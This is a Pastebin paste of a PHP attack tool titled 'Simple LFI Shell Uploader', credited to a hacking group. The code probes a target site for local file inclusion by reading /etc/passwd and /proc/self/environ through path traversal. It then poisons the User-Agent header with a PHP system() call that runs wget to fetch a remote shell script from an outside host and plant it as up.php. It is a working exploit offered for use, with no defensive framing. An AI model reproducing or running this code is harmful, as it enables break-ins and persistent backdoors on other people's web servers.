API tools faq
paste
TrojanSpot

Simple LFI Shell Uploader | www.pemula.info

TrojanSpot
Sep 20th, 2012
335
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.56 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head><title>Simple LFI Shell Uploader</title>
  3. <style type="text/css">
  4. body {
  5. background-color: #000000;
  6. font-family:"Courier New";
  7. color: silver;
  8. font-size:11px;
  9. }
  10. input {
  11. background-color: #000000;
  12. font-family:"Courier New";
  13. color: silver;
  14. font-size:11px;
  15. border:1px solid;
  16. border-color:silver;
  17. }
  18. </style>
  19. </head>
  20. <body><h3>Simple LFI Sh3ll Uploader</h3>
  21. <form method="post" action="">
  22. LFI URL: <input type="text" size="60" name="lfiurl" value="">
  23. <input type="submit" value="j00$ !!!">
  24. </form>
  25. <?php
  26. if($_POST['lfiurl']) {
  27. print "<pre>";
  28. $target = $_POST['lfiurl'];
  29. $testlfi = "../../../../../../../../../../../../../../../etc/passwd%00";
  30. $readenv = "../../../../../../../../../../../../../../../proc/self/environ%00";
  31. $mbooh = preg_split("/.php/", $target);
  32. $pecah = preg_split("/\//", $mbooh[0]);
  33. $path = "/";
  34. $azz = count($pecah) - 1;
  35. for($g = 3; $g<$azz;$g++) {
  36. $path.= $pecah[$g]."/";
  37. }
  38. $bug = $pecah[$azz].".php".$mbooh[1];
  39. $host = $pecah[2];
  40. print "[+] Testing LFI ... ";
  41. flush();
  42. $res = FetchURL($target.$testlfi);
  43. if(preg_match("/root:x:0:0/", $res)) {
  44. print "<font color='green'>Ok</font><br>[+] Reading /proc/self/environ ... ";
  45. flush();
  46. $rez = FetchURL($target.$readenv);
  47. if(preg_match("/DOCUMENT_ROOT=/", $rez)) {
  48. print "<font color='green'>Ok</font><br>[+] Exploiting target ... <br>";
  49. flush();
  50. $cmd = "<?php system('wget htt://www.neelsoftech.com/up.txt -O up.php');?>";
  51. $soket = fsockopen($host, 80);
  52. $req = "GET ".$path.$bug.$readenv." HTTP/1.0\r\nHost: ".$host."\r\nAccept: */*\r\nUser-Agent: ".$cmd."\r\n\r\n";
  53. fputs($soket, $req);
  54. fclose($soket);
  55. flush();
  56. $cek = FetchURL("http://".$host.$path."up.php");
  57. if(preg_match("/trojanspot Was Here/", $cek)) {
  58. print "[+] Exploit successful!<br>[+] Shell uploader to <font color='green'>http://".$host.$path."up.php</font>";
  59. } else {
  60. print "<font color='red'>[!] Exploit failed!</font><br>";
  61. }
  62. }
  63. else {
  64. print "<font color='red'>Failed</font><br>";
  65. }
  66. } else {
  67. print "<font color='red'>Failed</font><br>";
  68. }
  69. }
  70. function FetchURL($url) {
  71. $ch = curl_init();
  72. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");
  73. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  74. curl_setopt($ch, CURLOPT_HEADER, 1);
  75. curl_setopt($ch, CURLOPT_URL, $url);
  76. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  77. curl_setopt($ch, CURLOPT_TIMEOUT, 30);
  78. $data = curl_exec($ch);
  79. if(!$data) {
  80. return false;
  81. }
  82. return $data;
  83. }
  84. ?>
  85. <br>
  86. Copyleft &copy; 2011 by TrojanSpot!! [Atjeh Cyber Team'S]
  87. </body>
  88. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!